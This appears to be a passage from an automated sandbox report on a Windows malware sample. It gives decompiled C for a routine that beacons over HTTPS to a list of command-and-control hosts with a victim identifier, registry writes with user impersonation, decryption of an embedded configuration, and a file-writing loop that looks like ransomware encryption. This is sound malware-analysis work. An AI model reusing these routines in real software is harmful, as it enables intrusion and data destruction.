0x00ce669c
0x00ce66b1
0x00ce66d2
0x00ce66d8
0x00ce66e2
0x00ce66b3
0x00ce66bc
0x00ce66c5
0x00ce66c5
0x00ce66e9
0x00000000
0x00ce669a
0x00ce6409
0x00ce640c
0x00000000
0x00ce640c
0x00ce63e2
0x00ce63e5
0x00000000
0x00ce63e5
0x00ce63e0
0x00ce63b9
0x00000000
0x00ce63bb
0x00ce63be
0x00000000
0x00ce63be
0x00ce63b9
0x00ce630b
0x00ce6766
0x00ce6766
0x00ce676d
0x00ce6773
0x00ce6799
0x00ce6775
0x00ce6778
0x00ce6781
0x00ce678c
0x00ce678c
0x00ce6773
0x00ce67aa
0x00ce67aa

APIs

RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 00CE6285
wcscpy.NTDLL ref: 00CE629F
wcslen.NTDLL ref: 00CE62A9
wcscpy.NTDLL ref: 00CE62C8
wcscpy.NTDLL ref: 00CE62DA
RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 00CE62FE
wcscpy.NTDLL ref: 00CE6316
wcslen.NTDLL ref: 00CE6320
wcscpy.NTDLL ref: 00CE6332
MoveFileExW.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,?,?,?), ref: 00CE6343
CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,48000000,00000000), ref: 00CE6388
CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CE63B1
CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?,?), ref: 00CE63BE
CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CE63D8
CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?,?), ref: 00CE63E5
RtlAllocateHeap.NTDLL(00000000,00080104), ref: 00CE63FD
CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?,?), ref: 00CE640C
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE6749
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE6760
InterlockedIncrement.KERNEL32(00CF0AAA), ref: 00CE678C
InterlockedIncrement.KERNEL32(00CF0AAE), ref: 00CE6799

Strings

.418990b0, xrefs: 00CE6329

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Heapwcscpy$AllocateCloseCreateHandle$CompletionFileFreeIncrementInterlockedPortwcslen$Move
String ID: .418990b0
API String ID: 3011329582-1072401147
Opcode ID: f62ab0482054fafb41685e41289da10d77cdc7c6b9a133ee5849194f24127b1f
Instruction ID: cf1d51b446de064714cbf90925dfeacb9fa28b1ef453233e050fad88431f66f1
Opcode Fuzzy Hash: f62ab0482054fafb41685e41289da10d77cdc7c6b9a133ee5849194f24127b1f
Instruction Fuzzy Hash: 93E14870A00284EFEB219F52DC48BBE7B75FB24B44F200125FD26661E6C775AA84DF06

Uniqueness

Uniqueness Score: -1.00%

Function 00CE31EE, Relevance: 49.2, APIs: 21, Strings: 7, Instructions: 236
memorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00CE31EE(intOrPtr _a4, intOrPtr _a8) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void _v24;
				long _v28;
				long _v32;
				long _v36;
				WCHAR* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				short _v62;
				short _v94;
				short _v106;
				short _v108;
				void _v110;
				void* _t90;
				int _t91;
				long _t94;
				void* _t96;
				void* _t104;
				intOrPtr* _t107;
				int _t114;
				int _t116;
				long _t117;
				int _t118;
				int _t122;
				signed int _t124;
				signed int _t125;
				long _t128;
				void* _t129;
				char* _t130;
				wchar_t* _t131;
				void* _t132;
				void* _t133;
				void* _t134;

				_v8 = 0;
				_v48 = 0;
				_v52 = 0;
				_v44 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				if(_a4 != 0) {
					_t125 = E00CE1B2B(0xcf07d0, 0x10, _a4, _a8);
					if(_t125 != 0) {
						_v48 = RtlAllocateHeap( *0xcf0a9e, 8, _t125 * 2);
						__eflags = _v48;
						if(_v48 != 0) {
							_push(_v48);
							_push(_t125);
							_push(_a4);
							_t90 = E00CE12A4();
							_t91 = strlen("060108efb510c98");
							_t133 = _t132 + 4;
							_v52 = RtlAllocateHeap( *0xcf0a9e, 8, _t90 + _t91 + 0x16);
							__eflags = _v52;
							if(_v52 != 0) {
								_t130 =  &_v94;
								 *_t130 = 0x78382e25;
								_t130[4] = 0x2673253d;
								_t130[8] = 0x78382e25;
								_t130[0xc] = 0x73253d;
								_t94 = sprintf(_v52, _t130, E00CE200F(), _v48, _t129, "060108efb510c98");
								_t134 = _t133 + 0x18;
								_t128 = _t94;
								_v40 = E00CE1AEC(0xceb9cc);
								__eflags = _v40;
								if(_v40 != 0) {
									_t96 = InternetOpenW(_v40, 0, 0, 0, 0); // executed
									_v12 = _t96;
									__eflags = _v12;
									if(_v12 != 0) {
										_t131 =  *0xcf0918; // 0x7ae418
										while(1) {
											_t104 = InternetConnectW(_v12, _t131, 0x1bb, 0, 0, 3, 0, 0); // executed
											_v16 = _t104;
											__eflags = _v16;
											if(__eflags != 0) {
												goto L17;
											}
											L12:
											_t124 = wcslen(_t131);
											_t134 = _t134 + 4;
											__eflags = _t124;
											if(_t124 != 0) {
												_t131 = _t131 + 2 + _t124 * 2;
												__eflags =  *_t131;
												if( *_t131 != 0) {
													continue;
												} else {
												}
											} else {
											}
											goto L31;
											L17:
											E00CE3529(__eflags,  &_v94);
											_t107 =  &_v62;
											 *_t107 = 0x4f0050;
											 *((intOrPtr*)(_t107 + 4)) = 0x540053;
											 *((short*)(_t107 + 8)) = 0;
											_v20 = HttpOpenRequestW(_v16,  &_v62,  &_v94, 0, 0, 0, 0x800000, 0);
											__eflags = _v20;
											if(_v20 != 0) {
												_v44 = E00CE1AEC(0xceba6c);
												__eflags = _v44;
												if(_v44 != 0) {
													_v28 = 4;
													_t114 = InternetQueryOptionW(_v20, 0x1f,  &_v24,  &_v28);
													__eflags = _t114;
													if(_t114 != 0) {
														_v24 = _v24 | 0x84603300;
														_t116 = InternetSetOptionW(_v20, 0x1f,  &_v24, 4);
														__eflags = _t116;
														if(_t116 != 0) {
															_t117 = wcslen(_v44);
															_t134 = _t134 + 4;
															_t118 = HttpSendRequestW(_v20, _v44, _t117, _v52, _t128); // executed
															__eflags = _t118;
															if(_t118 != 0) {
																_v32 = 0x10;
																_v36 = 0;
																_t122 = HttpQueryInfoW(_v20, 0x13,  &_v110,  &_v32,  &_v36);
																__eflags = _t122;
																if(_t122 == 0) {
																	L30:
																	RtlFreeHeap( *0xcf0a9e, 0, _v44);
																	goto L12;
																} else {
																	__eflags = _v110 - 0x35;
																	if(_v110 != 0x35) {
																		goto L30;
																	} else {
																		__eflags = _v108 - 0x30;
																		if(_v108 != 0x30) {
																			goto L30;
																		} else {
																			__eflags = _v106 - 0x30;
																			if(_v106 != 0x30) {
																				goto L30;
																			} else {
																				_v8 = 1;
																			}
																		}
																	}
																}
															}
														}
													}
												} else {
												}
											}
											goto L31;
										}
									}
								} else {
								}
							} else {
							}
						} else {
						}
					} else {
					}
					L31:
					if(_v20 != 0) {
						InternetCloseHandle(_v20); // executed
					}
					if(_v16 != 0) {
						InternetCloseHandle(_v16);
					}
					if(_v12 != 0) {
						InternetCloseHandle(_v12);
					}
					if(_v44 != 0) {
						RtlFreeHeap( *0xcf0a9e, 0, _v44);
					}
					if(_v40 != 0) {
						RtlFreeHeap( *0xcf0a9e, 0, _v40);
					}
					if(_v52 != 0) {
						RtlFreeHeap( *0xcf0a9e, 0, _v52);
					}
					if(_v48 != 0) {
						RtlFreeHeap( *0xcf0a9e, 0, _v48);
					}
				}
				return _v8;
			}

0x00ce31f9
0x00ce3200
0x00ce3207
0x00ce320e
0x00ce3215
0x00ce321c
0x00ce3223
0x00ce322e
0x00ce3246
0x00ce324a
0x00ce3267
0x00ce326a
0x00ce326e
0x00ce3275
0x00ce3278
0x00ce3279
0x00ce327c
0x00ce3288
0x00ce328e
0x00ce32a4
0x00ce32a7
0x00ce32ab
0x00ce32b2
0x00ce32b5
0x00ce32bb
0x00ce32c2
0x00ce32c9
0x00ce32e3
0x00ce32e9
0x00ce32ec
0x00ce32f8
0x00ce32fb
0x00ce32ff
0x00ce3311
0x00ce3317
0x00ce331a
0x00ce331e
0x00ce3324
0x00ce332a
0x00ce333d
0x00ce3343
0x00ce3346
0x00ce334a
0x00000000
0x00000000
0x00ce334c
0x00ce334d
0x00ce3353
0x00ce3356
0x00ce3358
0x00ce335f
0x00ce3363
0x00ce3367
0x00000000
0x00000000
0x00ce3369
0x00000000
0x00ce335a
0x00000000
0x00ce3370
0x00ce3378
0x00ce337d
0x00ce3380
0x00ce3386
0x00ce338d
0x00ce33b1
0x00ce33b4
0x00ce33b8
0x00ce33c8
0x00ce33cb
0x00ce33cf
0x00ce33d6
0x00ce33ea
0x00ce33f0
0x00ce33f2
0x00ce33f8
0x00ce340a
0x00ce3410
0x00ce3412
0x00ce3417
0x00ce341d
0x00ce342b
0x00ce3431
0x00ce3433
0x00ce3435
0x00ce343c
0x00ce3454
0x00ce345a
0x00ce345c
0x00ce347c
0x00ce3487
0x00000000
0x00ce345e
0x00ce345e
0x00ce3463
0x00000000
0x00ce3465
0x00ce3465
0x00ce346a
0x00000000
0x00ce346c
0x00ce346c
0x00ce3471
0x00000000
0x00ce3473
0x00ce3473
0x00ce3473
0x00ce3471
0x00ce346a
0x00ce3463
0x00ce345c
0x00ce3433
0x00ce3412
0x00000000
0x00ce33d1
0x00ce33cf
0x00000000
0x00ce33b8
0x00ce332a
0x00000000
0x00ce3301
0x00000000
0x00ce32ad
0x00000000
0x00ce3270
0x00000000
0x00ce324c
0x00ce3492
0x00ce3496
0x00ce349b
0x00ce349b
0x00ce34a5
0x00ce34aa
0x00ce34aa
0x00ce34b4
0x00ce34b9
0x00ce34b9
0x00ce34c3
0x00ce34d0
0x00ce34d0
0x00ce34da
0x00ce34e7
0x00ce34e7
0x00ce34f1
0x00ce34fe
0x00ce34fe
0x00ce3508
0x00ce3515
0x00ce3515
0x00ce3508
0x00ce3526

APIs

RtlAllocateHeap.NTDLL(00000008,00000000,00CF07D0), ref: 00CE3261
InternetCloseHandle.WININET(00000000), ref: 00CE349B
InternetCloseHandle.WININET(00000000), ref: 00CE34AA
InternetCloseHandle.WININET(00000000), ref: 00CE34B9
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE34D0
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE34E7
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE34FE
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE3515

Strings

5, xrefs: 00CE345E
0, xrefs: 00CE346C
=%s, xrefs: 00CE32C9
=%s&, xrefs: 00CE32BB
%.8x, xrefs: 00CE32C2
0, xrefs: 00CE3465
060108efb510c98, xrefs: 00CE3283, 00CE32D5

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$CloseHandleInternet$Allocate
String ID: %.8x$0$0$060108efb510c98$5$=%s$=%s&
API String ID: 288361501-4075666349
Opcode ID: cd0ffdf0f0fc7bbfa1257562321c51e75bf860d286ccd829cd6255d9d80f00da
Instruction ID: 3f3fce8556585ccb08ad36ccfd8553c560b5e01a2d0681622306f3184a205066
Opcode Fuzzy Hash: cd0ffdf0f0fc7bbfa1257562321c51e75bf860d286ccd829cd6255d9d80f00da
Instruction Fuzzy Hash: C5A15B70900289EFEB219F92DC4DBEEBBB5FB04704F208025E511760E2D7B56A94DF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00CE4037, Relevance: 34.7, APIs: 23, Instructions: 164
memoryregistryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00CE4037(short* _a4) {
				void* _v8;
				short _v532;
				long _v1052;
				signed int _t35;
				void* _t37;
				long _t44;
				long _t47;
				long _t57;
				long _t62;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				wchar_t* _t72;

				if( *0xcf0928 != 0) {
					ImpersonateLoggedOnUser( *0xcf0aa6);
				}
				 *0xcf0eb6(0,  &_v1052, 0x1c, 0); // executed
				PathAddBackslashW( &_v1052);
				_t72 =  &(_a4[1]);
				wcscat( &_v1052, _t72);
				_t67 = E00CE1AEC(0xcebde4);
				wcscat( &_v1052, _t67);
				RtlFreeHeap( *0xcf0a9e, 0, _t67);
				_t68 = E00CE1AEC(0xcebe10);
				_t35 =  *0xcebe0c; // 0x16b9
				_t37 = RtlAllocateHeap( *0xcf0a9e, 0, _t35 << 6); // executed
				_t70 = _t37;
				E00CE1D9E( &_v1052, _t70, E00CE1582(_t68, _t70)); // executed
				RtlFreeHeap( *0xcf0a9e, 0, _t68);
				RtlFreeHeap( *0xcf0a9e, 0, _t70);
				if( *0xcf0928 != 0) {
					RevertToSelf();
				}
				_t44 = RegCreateKeyExW(0x80000000, _a4, 0, 0, 0, 0x2000000, 0,  &_v8, 0); // executed
				if(_t44 == 0) {
					_t47 = RegSetValueExW(_v8, 0xcf0774, 0, 1, _t72, 2 + wcslen(_t72) * 2); // executed
					if(_t47 == 0) {
						RegCloseKey(_v8);
						wcscpy( &_v532, _t72);
						_t69 = E00CE1AEC(0xcebdf2);
						wcscat( &_v532, _t69);
						RtlFreeHeap( *0xcf0a9e, 0, _t69);
						_t57 = RegCreateKeyExW(0x80000000,  &_v532, 0, 0, 0, 0x2000000, 0,  &_v8, 0); // executed
						if(_t57 == 0) {
							_t62 = RegSetValueExW(_v8, 0xcf0778, 0, 1,  &_v1052, 2 + wcslen( &_v1052) * 2); // executed
							if(_t62 == 0) {
								SHChangeNotify(0x8000000, 0x1000, 0, 0); // executed
								return _t62;
							}
							return RegCloseKey(_v8);
						}
						return _t57;
					}
					return RegCloseKey(_v8);
				} else {
					return _t44;
				}
			}

0x00ce404c
0x00ce4054
0x00ce4054
0x00ce4067
0x00ce4074
0x00ce407d
0x00ce4088
0x00ce409b
0x00ce40a5
0x00ce40b7
0x00ce40c7
0x00ce40c9
0x00ce40da
0x00ce40e0
0x00ce40f2
0x00ce4100
0x00ce410f
0x00ce411c
0x00ce411e
0x00ce411e
0x00ce413f
0x00ce4147
0x00ce416d
0x00ce4175
0x00ce4188
0x00ce4196
0x00ce41a9
0x00ce41b3
0x00ce41c5
0x00ce41ea
0x00ce41f2
0x00ce4221
0x00ce4229
0x00ce4244
0x00000000
0x00ce4244
0x00000000
0x00ce422e
0x00000000
0x00ce41f2
0x00000000
0x00000000
0x00000000
0x00000000

APIs

ImpersonateLoggedOnUser.ADVAPI32 ref: 00CE4054
SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001C,00000000), ref: 00CE4067
PathAddBackslashW.SHLWAPI(?), ref: 00CE4074
wcscat.NTDLL ref: 00CE4088
wcscat.NTDLL ref: 00CE40A5
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE40B7
RtlAllocateHeap.NTDLL(00000000,000016B9,00CEBE10), ref: 00CE40DA
RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 00CE4100
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE410F
RevertToSelf.ADVAPI32 ref: 00CE411E
RegCreateKeyExW.KERNEL32(80000000,00CED4DD,00000000,00000000,00000000,02000000,00000000,00000010,00000000), ref: 00CE413F
wcslen.NTDLL ref: 00CE414F
RegSetValueExW.KERNEL32(00000010,00CF0774,00000000,00000001,00CED4DB,00000000), ref: 00CE416D
RegCloseKey.ADVAPI32(00000010), ref: 00CE417A
RegCloseKey.ADVAPI32(00000010), ref: 00CE4188
wcscpy.NTDLL ref: 00CE4196
wcscat.NTDLL ref: 00CE41B3
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE41C5
RegCreateKeyExW.KERNEL32(80000000,?,00000000,00000000,00000000,02000000,00000000,00000010,00000000), ref: 00CE41EA

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$wcscat$CloseCreatePath$AllocateBackslashFolderImpersonateLoggedRevertSelfSpecialUserValuewcscpywcslen
String ID:
API String ID: 4089252001-0
Opcode ID: d9644528229a14c8c144ddad9a2d8712f369991cbcc9f0ef9388b5ab8ba6dcd2
Instruction ID: 34336dfd4339438712fd346a377d130bb64ac97f55484238cc4d7f71b56f2a8f
Opcode Fuzzy Hash: d9644528229a14c8c144ddad9a2d8712f369991cbcc9f0ef9388b5ab8ba6dcd2
Instruction Fuzzy Hash: 31515771640258BBE7109B91EC4AFFE377DEB04F42F300061F605E50A2DBB16A94DB66

Uniqueness

Uniqueness Score: -1.00%

Function 00CE289B, Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 238
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE289B(void* __eax) {
				void* _t26;
				signed int _t29;
				void* _t31;
				void* _t97;

				_t26 = 0;
				while( *((intOrPtr*)(_t26 + 0xced4ed)) != 0xefbeadde) {
					_t26 = _t26 + 1;
				}
				E00CE1472(E00CE16D5(0xced4ed, _t26), 0xcf07f8, 0xced4ed, 0x100);
				_t29 =  *0xced5ed; // 0x0
				_t31 = RtlAllocateHeap( *0xcf0a9e, 8, _t29 << 6); // executed
				_t97 = _t31;
				E00CE1582(0xced5f1, _t97);
				E00CE1472(_t97, "060108efb510c98", _t97, 0x20);
				_t2 = _t97 + 0x20; // 0x20
				E00CE1472(_t2, 0xcf07e0, _t2, 0x18);
				if( *0xcf07eb != 0) {
					_t3 = _t97 + 0x38; // 0x38
					 *0xcf08f8 = RtlAllocateHeap( *0xcf0a9e, 8, E00CE2BFD(_t3));
					_t4 = _t97 + 0x38; // 0x38
					E00CE1472(_t4,  *0xcf08f8, _t4, _t92);
				}
				if( *0xcf07ec != 0) {
					_t5 = _t97 + 0x808; // 0x808
					 *0xcf08fc = RtlAllocateHeap( *0xcf0a9e, 8, E00CE2BFD(_t5));
					_t6 = _t97 + 0x808; // 0x808
					E00CE1472(_t6,  *0xcf08fc, _t6, _t87);
				}
				if( *0xcf07ed != 0) {
					_t7 = _t97 + 0xfd8; // 0xfd8
					 *0xcf0900 = RtlAllocateHeap( *0xcf0a9e, 8, E00CE2BFD(_t7));
					_t8 = _t97 + 0xfd8; // 0xfd8
					E00CE1472(_t8,  *0xcf0900, _t8, _t82);
				}
				if( *0xcf07ee != 0) {
					_t9 = _t97 + 0x17a8; // 0x17a8
					 *0xcf0904 = RtlAllocateHeap( *0xcf0a9e, 8, E00CE2BFD(_t9));
					_t10 = _t97 + 0x17a8; // 0x17a8
					E00CE1472(_t10,  *0xcf0904, _t10, _t77);
				}
				if( *0xcf07ef != 0) {
					_t11 = _t97 + 0x1f78; // 0x1f78
					 *0xcf0908 = RtlAllocateHeap( *0xcf0a9e, 8, E00CE2BFD(_t11));
					_t12 = _t97 + 0x1f78; // 0x1f78
					E00CE1472(_t12,  *0xcf0908, _t12, _t72);
				}
				if( *0xcf07e1 != 0) {
					_t13 = _t97 + 0x2748; // 0x2748
					 *0xcf090c = RtlAllocateHeap( *0xcf0a9e, 8, E00CE2BFD(_t13));
					_t14 = _t97 + 0x2748; // 0x2748
					E00CE1472(_t14,  *0xcf090c, _t14, _t67);
				}
				if( *0xcf07f0 != 0) {
					_t15 = _t97 + 0x2f18; // 0x2f18
					 *0xcf0910 = RtlAllocateHeap( *0xcf0a9e, 8, E00CE2BFD(_t15));
					_t16 = _t97 + 0x2f18; // 0x2f18
					E00CE1472(_t16,  *0xcf0910, _t16, _t62);
				}
				if( *0xcf07f1 != 0) {
					_t17 = _t97 + 0x36e8; // 0x36e8
					 *0xcf0914 = RtlAllocateHeap( *0xcf0a9e, 8, E00CE2BFD(_t17));
					_t18 = _t97 + 0x36e8; // 0x36e8
					E00CE1472(_t18,  *0xcf0914, _t18, _t57);
				}
				if( *0xcf07f7 != 0) {
					_t19 = _t97 + 0x3eb8; // 0x3eb8
					 *0xcf0918 = RtlAllocateHeap( *0xcf0a9e, 8, E00CE2BFD(_t19));
					_t20 = _t97 + 0x3eb8; // 0x3eb8
					E00CE1472(_t20,  *0xcf0918, _t20, _t52);
				}
				if( *0xcf07f2 != 0) {
					_t21 = _t97 + 0x42a0; // 0x42a0
					 *0xcf091c = RtlAllocateHeap( *0xcf0a9e, 8, E00CE2BFD(_t21));
					_t22 = _t97 + 0x42a0; // 0x42a0
					E00CE1472(_t22,  *0xcf091c, _t22, _t47);
				}
				if( *0xcf07f3 != 0) {
					_t23 = _t97 + 0x4a70; // 0x4a70
					 *0xcf0920 = RtlAllocateHeap( *0xcf0a9e, 8, E00CE2BFD(_t23));
					_t24 = _t97 + 0x4a70; // 0x4a70
					E00CE1472(_t24,  *0xcf0920, _t24, _t40);
					 *0xcf0930 = RtlComputeCrc32(0xffffffff,  *0xcf0920, strlen( *0xcf0920));
				}
				return E00CE13DA(RtlFreeHeap( *0xcf0a9e, 0, _t97), 0xced4cd, 0x3124);
			}

0x00ce28a7
0x00ce28a9
0x00ce28b4
0x00ce28b4
0x00ce28c9
0x00ce28ce
0x00ce28df
0x00ce28e5
0x00ce28ed
0x00ce28fc
0x00ce2903
0x00ce290c
0x00ce2918
0x00ce291a
0x00ce2934
0x00ce293a
0x00ce2944
0x00ce2944
0x00ce2950
0x00ce2952
0x00ce296f
0x00ce2975
0x00ce2982
0x00ce2982
0x00ce298e
0x00ce2990
0x00ce29ad
0x00ce29b3
0x00ce29c0
0x00ce29c0
0x00ce29cc
0x00ce29ce
0x00ce29eb
0x00ce29f1
0x00ce29fe
0x00ce29fe
0x00ce2a0a
0x00ce2a0c
0x00ce2a29
0x00ce2a2f
0x00ce2a3c
0x00ce2a3c
0x00ce2a48
0x00ce2a4a
0x00ce2a67
0x00ce2a6d
0x00ce2a7a
0x00ce2a7a
0x00ce2a86
0x00ce2a88
0x00ce2aa5
0x00ce2aab
0x00ce2ab8
0x00ce2ab8
0x00ce2ac4
0x00ce2ac6
0x00ce2ae3
0x00ce2ae9
0x00ce2af6
0x00ce2af6
0x00ce2b02
0x00ce2b04
0x00ce2b21
0x00ce2b27
0x00ce2b34
0x00ce2b34
0x00ce2b40
0x00ce2b42
0x00ce2b5f
0x00ce2b65
0x00ce2b72
0x00ce2b72
0x00ce2b7e
0x00ce2b80
0x00ce2b9d
0x00ce2ba3
0x00ce2bb0
0x00ce2bd3
0x00ce2bd3
0x00ce2bfc

APIs

RtlAllocateHeap.NTDLL(00000008,00000000,00CF07F8), ref: 00CE28DF
RtlAllocateHeap.NTDLL(00000008,00000000,00000038), ref: 00CE292E
RtlAllocateHeap.NTDLL(00000008,00000000,00000808), ref: 00CE2969
RtlAllocateHeap.NTDLL(00000008,00000000,00000FD8), ref: 00CE29A7
RtlAllocateHeap.NTDLL(00000008,00000000,000017A8), ref: 00CE29E5
RtlAllocateHeap.NTDLL(00000008,00000000,00001F78), ref: 00CE2A23
RtlAllocateHeap.NTDLL(00000008,00000000,00002748), ref: 00CE2A61
RtlAllocateHeap.NTDLL(00000008,00000000,00002F18), ref: 00CE2A9F
RtlAllocateHeap.NTDLL(00000008,00000000,000036E8), ref: 00CE2ADD
RtlAllocateHeap.NTDLL(00000008,00000000,00003EB8), ref: 00CE2B1B
RtlAllocateHeap.NTDLL(00000008,00000000,000042A0), ref: 00CE2B59
RtlAllocateHeap.NTDLL(00000008,00000000,00004A70), ref: 00CE2B97
strlen.NTDLL ref: 00CE2BBB
RtlComputeCrc32.NTDLL(000000FF,00000000,00000010), ref: 00CE2BCD
RtlFreeHeap.NTDLL(00000000,00000000,00CF07E0), ref: 00CE2BE1

Strings

@V{, xrefs: 00CE296F, 00CE297C
xI{, xrefs: 00CE2B5F, 00CE2B6C
8z, xrefs: 00CE2A67, 00CE2A74
060108efb510c98, xrefs: 00CE28F7

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Allocate$ComputeCrc32Freestrlen
String ID: 060108efb510c98$8z$@V{$xI{
API String ID: 3981784713-324620346
Opcode ID: 419c99f338064c11ddb5a40f746bebe47df93da29f27265c7204446ba4849fbb
Instruction ID: fee6a38c64d6a64e5a8fd8d171b690a9b77bc7ffe36879ee8e030baa74b32063
Opcode Fuzzy Hash: 419c99f338064c11ddb5a40f746bebe47df93da29f27265c7204446ba4849fbb
Instruction Fuzzy Hash: 5F9193B1101284BFF721AF61EC49FBA3B6DEB05B40F280071BC458A1B7D7712A54EB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CE5E73, Relevance: 27.2, APIs: 18, Instructions: 182
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00CE5E73() {
				struct _OVERLAPPED* _v8;
				long _v12;
				long _v16;
				char _v144;
				int _t54;
				long _t55;
				int _t66;
				intOrPtr _t73;
				int _t78;
				int _t85;
				void* _t92;
				void* _t95;

				while(1) {
					_t54 = GetQueuedCompletionStatus( *0xcf1028,  &_v12,  &_v16,  &_v8, 0xffffffff);
					_t92 = _v8;
					if(_t54 == 0) {
					}
					L2:
					if( *[fs:0x34] != 0x26) {
						L4:
						CloseHandle( *(_t92 + 0x2c));
						RtlFreeHeap( *0xcf0a9e, 0, _t92);
						while(1) {
							_t54 = GetQueuedCompletionStatus( *0xcf1028,  &_v12,  &_v16,  &_v8, 0xffffffff);
							_t92 = _v8;
							if(_t54 == 0) {
							}
							goto L7;
						}
						goto L2;
					}
					L3:
					 *(_t92 + 0x30) = 2;
					if(PostQueuedCompletionStatus( *0xcf1028, 0, 0, _t92) != 0) {
						continue;
					}
					goto L4;
					L7:
					if(_t92 != 0) {
						_t55 =  *(_t92 + 0x30);
						if(_t55 != 0) {
							if(_t55 != 1) {
								if(_t55 != 2) {
									if(_t55 != 4) {
										L39:
										continue;
									}
									while( *_t92 == 0x103) {
										Sleep(0);
									}
									if( *0xcf092c != 0) {
										 *0xcf0cfa( &_v144, 0xceb4cc,  *(_t92 + 0x2c));
										_t95 = _t95 + 0xc;
										E00CE3E63( *0xcf092c, 0xceb20a, 0xceb4e8,  &_v144, 0);
									}
									CloseHandle( *(_t92 + 0x2c));
									RtlFreeHeap( *0xcf0a9e, 0, _t92); // executed
									InterlockedIncrement(0xcf1044);
									goto L39;
								}
								 *(_t92 + 8) = 0xffffffff;
								 *(_t92 + 0xc) = 0xffffffff;
								 *(_t92 + 0x30) = 4;
								_t66 = WriteFile( *(_t92 + 0x2c), _t92 + 0x74, 0x90,  &_v12, _t92); // executed
								if(_t66 == 0 &&  *[fs:0x34] != 0x3e5) {
									CloseHandle( *(_t92 + 0x2c));
									RtlFreeHeap( *0xcf0a9e, 0, _t92);
								}
								continue;
							}
							E00CE209C(_t92 + 0x34, _t92 + 0x104, _t92 + 0x104, _v12);
							if( *((intOrPtr*)(_t92 + 0x24)) == 0) {
								_t73 =  *((intOrPtr*)(_t92 + 0x1c));
								if( *((intOrPtr*)(_t92 + 0x20)) != 0xffffffff || _t73 != 0xffffffff) {
									 *(_t92 + 0x14) =  *(_t92 + 0x14) + _t73;
									asm("adc [ebx+0x18], edx");
